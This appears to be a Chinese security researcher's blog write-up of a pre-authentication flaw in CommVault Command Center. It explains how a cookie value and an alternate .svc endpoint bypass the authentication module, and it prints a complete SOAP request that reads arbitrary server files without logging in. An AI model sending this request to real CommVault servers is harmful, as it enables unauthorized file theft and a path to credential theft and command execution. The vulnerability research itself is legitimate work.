CommVault Command Center Pre-Auth Rce

警告
本文最后更新于 2021-11-25,文中内容可能已过时。

CommVault这玩意是两种语言(.net和java)开发的,两掺挺有意思。

# 搭环境

下载链接

安装会自动更新 恶心坏了 只能在更新打补丁前先把dll拷出来然后再覆盖进去。

# 分析

整个流程就是从一个权限绕过到文件读取,然后读用户密码拿到token,(java)最后通过api执行命令。只分析前半段,因为后半段java的源码被自动更新覆盖了,复现不了。

查看iis配置发现在81端口开放了多个虚拟目录,其中一个映射到了C:\Program Files\Commvault\ContentStore\CVSearchService

image.png

查看web.config中,使用CVInfoMgmtService.CVAuthHttpModulemodule来做权限校验。

image.png

CVAuthHttpModule类的Init中注册了几个事件OnEnter

image.png

在OnEnter中根据this.reject布尔值来判断是否拒绝访问,我们需要构造this.reject=false

image.png

向上回溯

image.png

this.reject在此处根据三个条件判断

  1. text!=null
  2. !flag3 ==true
  3. NonSecureOperations.canByPassCheck(text) == true

text值取自CVAuthHttpModule.readHeader()

image.png

跟进发现是从cookie中取

image.png

那么第一个条件随便满足,然后看NonSecureOperations.canByPassCheck(text) == true

image.png

canByPassCheck()先对传入参数解码,然后判断自身list中是否存在,如果存在极为true,而encodePass()函数就是base64解码而已

image.png

那么第三个条件满足,看第二个条件!flag3 ==true

flag3变量取自bool flag3 = this.IsRestWebService();

image.png

获取当前uri判断是否以CVWEBSERVICE.SVC结尾,那么我们可以用CVSearchService.svc。所以这里就有了一个权限绕过,可以访问CVSearchService.svc下的服务。

image.png

这有个文件读取。请求包如下

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
POST /SearchSvc/CVSearchService.svc HTTP/1.1
Host: 192.168.137.173:81
cookie: DataService.PopulateData
Connection: close
Content-Type: text/xml
soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile
Content-Length: 338

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:downLoadFile>
         <tem:path>c:/Program Files/Commvault/ContentStore/Log Files/WebServer.log</tem:path>
      </tem:downLoadFile>
   </soapenv:Body>
</soapenv:Envelope>

image.png

nuclei已经有pr提交了 https://github.com/projectdiscovery/nuclei-templates/pull/3182/files

# 修复

image.png

# 后半段

  1. https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html
  2. https://srcincite.io/pocs/cve-2021-%7B34993,34996%7D.py.txt

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。